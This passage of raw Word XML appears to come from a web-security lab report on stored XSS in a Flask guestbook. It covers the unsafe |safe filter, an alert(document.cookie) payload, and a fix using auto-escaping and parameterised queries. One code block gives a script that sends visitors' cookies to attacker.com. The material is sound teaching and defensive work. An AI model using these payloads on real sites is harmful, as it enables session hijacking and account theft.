                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># In the template:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E02F33" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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comments_html</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> | safe }}   &lt;-- |safe tells Jinja2: 'trust this, don't escape it'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25ABD1DD" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B9ED949" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>When a visitor loads the page, the browser receives a &lt;script&gt; tag in the HTML body and executes it. Because the payload is stored in the database, every subsequent visitor also triggers the script — this is why it is called stored (or persistent) XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2802A2BB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0829B847" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 – Advanced XSS: Cookie Theft Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F3530" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The following payload was submitted to demonstrate cookie access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F85185" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="3B52CFF8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3C5C486A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;script&gt;alert(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73011F2D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="300" w:type="dxa"/>
          <w:left w:w="200" w:type="dxa"/>
          <w:bottom w:w="300" w:type="dxa"/>
          <w:right w:w="200" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00892D2F" w14:paraId="21770243"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7F7"/>
          </w:tcPr>
          <w:p w14:paraId="0D16097F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="5" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="73E0B455" wp14:editId="0E730D27">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5689600" cy="319849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0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5689600" cy="3198495"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D9E95DC" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E80ABC" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Session Hijacking Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0CB34" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In a real application where session cookies are present, this attack is far more dangerous. An attacker would replace the alert with code that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exfiltrates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the cookie to a server they control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB05BEF" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="77746EDA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2BC3DC0F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Realistic malicious payload (for illustration only):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13DDE512" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A9B12A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  new Image().</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 'https://attacker.com/steal?c=' + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02FE78FF" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48CDA572" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1450E7C0" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any user who loads the comments page would silently send their session cookie to the attacker. The attacker can then paste that cookie value into their browser, impersonating the victim with full access to their account — without ever knowing their password. This is why the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cookie flag exists: it prevents JavaScript from reading session cookies, limiting the damage even if XSS occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED76259" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E4F9FA" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 – Mitigation: Output Encoding and CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1656B939" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Fix 1: Remove |safe and Use Template Loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C8B8A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The root cause of the XSS is the |safe filter combined with raw string interpolation. The fix is to remove |safe entirely and pass the raw rows list to the template, letting Jinja2's auto-escaping encode any HTML characters (&lt;, &gt;, &amp;, ", ') into harmless entities (&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3451D9B7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="69809EB5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="431A1E3E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># SECURE view function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C07056A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>@app.route('/comments', methods=['GET', 'POST'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1467ABFF" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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comments():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683E0C1C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    conn = sqlite3.connect('</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>database.db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F636A09" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    c = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>conn.cursor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E7A946" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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request.method</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> == 'POST':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39559947" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        comment = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>request.form</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>['comment']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E61123" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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c.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('INSERT INTO comments (content) VALUES (?)', (comment,))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C2C251C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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conn.commit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54988241" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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c.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('SELECT content FROM comments')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C9E4B5" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    rows = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>c.fetchall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5157DF93" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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conn.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3328F2EE" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Pass rows directly to the template (no |safe, no manual HTML building)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FC56D9" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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render_template_string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9C9A20" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;h2&gt;Guestbook&lt;/h2&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55D1888D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;form method="POST"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62707BA3" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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textarea</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> name="comment"&gt;&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>textarea</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10440412" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            &lt;input type="submit" value="Post Comment"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C5CD094" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FBA6D6C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;h3&gt;Comments:&lt;/h3&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E048FCB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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ul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="300D2422" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        {% for row in rows %}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="032FE779" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          &lt;li&gt;{{ row[0] }}&lt;/li&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCFCC7F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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endfor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> %}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41E4FF2D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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ul</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="091E466E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ''', rows=rows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0655812A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
